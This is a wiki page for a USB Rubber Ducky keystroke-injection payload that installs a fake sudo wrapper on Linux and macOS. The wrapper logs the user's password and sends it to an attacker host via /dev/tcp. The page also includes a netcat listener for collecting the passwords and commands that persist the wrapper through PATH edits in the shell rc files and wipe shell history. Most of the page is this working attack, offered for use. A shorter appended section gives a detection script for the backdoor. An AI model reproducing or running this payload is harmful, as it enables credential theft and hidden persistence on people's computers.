wiki-rubber-ducky-usb/Linux-and-OSX-sudo-password...

Payload originally designed by oXis for Bash Bunny.

Bash Bunny Payload page: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor

Change example.com to your own domain or listening IP address and 1337 to your own port of choice.

REM Original Author: oXis
REM Modified by 5h@d0w
DELAY 2000
GUI space
DELAY 500
ALT F2
DELAY 500
BACKSPACE
DELAY 100
STRING terminal
ENTER
DELAY 3000
STRING mkdir -p ~/.config/sudo
ENTER
DELAY 100
STRING rm  ~/.config/sudo/sudo
ENTER
DELAY 100
STRING echo '#!/bin/bash
ENTER
STRING /usr/bin/sudo -n true 2>/dev/null
ENTER
STRING if [ $? -eq 0 ]
ENTER
STRING then
ENTER
STRING /usr/bin/sudo $@
ENTER
STRING else
ENTER
STRING echo -n "[sudo] password for $USER: "
ENTER
STRING read -s pwd
ENTER
STRING echo
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
ENTER
STRING if [ $? -eq 1 ]
ENTER
STRING then
ENTER
STRING echo "$USER:$pwd:invalid" > /dev/tcp/example.com/1337
ENTER
STRING echo "Sorry, try again."
ENTER
STRING sudo $@
ENTER
STRING else
ENTER
STRING echo "$USER:$pwd:valid" > /dev/tcp/example.com/1337
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S $@
ENTER
STRING fi
ENTER
STRING fi' > ~/.config/sudo/sudo
ENTER
DELAY 600
STRING chmod u+x ~/.config/sudo/sudo
ENTER
DELAY 800
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
ENTER
DELAY 500
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 500
STRING history -c && rm .bash_history && exit
ENTER
DELAY 1000
GUI q

Use this bash script to listen on your server:

#!/bin/bash
while [ true ]
do
netcat -vv -lp 1337 >> passwd.txt
done
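
Added example, not part of the original payload or the Bash Bunny project: a check for the persistence this payload leaves behind, namely a `sudo` that resolves ahead of the system binary in PATH and rc-file lines that prepend a home directory to PATH. The trusted location `/usr/bin/sudo` and all function names are assumptions made for this example.

```shell
#!/bin/bash
# Added defensive example; function names are hypothetical.
# Assumption: the legitimate binary lives at /usr/bin/sudo.

# Print every executable named "sudo" in the given PATH string, in lookup order.
list_sudo_candidates() (
    set -f          # no globbing while splitting PATH
    IFS=:
    for dir in $1; do
        [ -n "$dir" ] || dir=.      # an empty PATH entry means the current directory
        if [ -f "$dir/sudo" ] && [ -x "$dir/sudo" ]; then
            printf '%s\n' "$dir/sudo"
        fi
    done
)

# Return 0 if the first "sudo" the shell would run is not the trusted binary.
# $1 = PATH string, $2 = trusted path (default /usr/bin/sudo).
sudo_is_shadowed() (
    trusted=${2:-/usr/bin/sudo}
    first=$(list_sudo_candidates "$1" | head -n 1)
    [ -n "$first" ] && [ "$first" != "$trusted" ]
)

# Print rc-file lines (file:line:text) that put a directory under the home
# directory in front of PATH. Legitimate entries such as ~/bin also match,
# so the output is a list to review, not a verdict.
find_path_prepends() (
    for f in "$1/.bash_profile" "$1/.bashrc" "$1/.profile"; do
        if [ -f "$f" ]; then
            grep -nHE "PATH=[\"']?(~|\\\$HOME|$1)/[^:]*:" "$f" || true
        fi
    done
)

# Report for the current user when the script is run directly.
if sudo_is_shadowed "$PATH"; then
    echo "WARNING: first sudo in PATH is $(list_sudo_candidates "$PATH" | head -n 1)"
fi
find_path_prepends "$HOME"
```

A hit on `~/.config/sudo/sudo` together with the matching `export PATH=` lines in `~/.bashrc` or `~/.bash_profile` corresponds to what this payload writes.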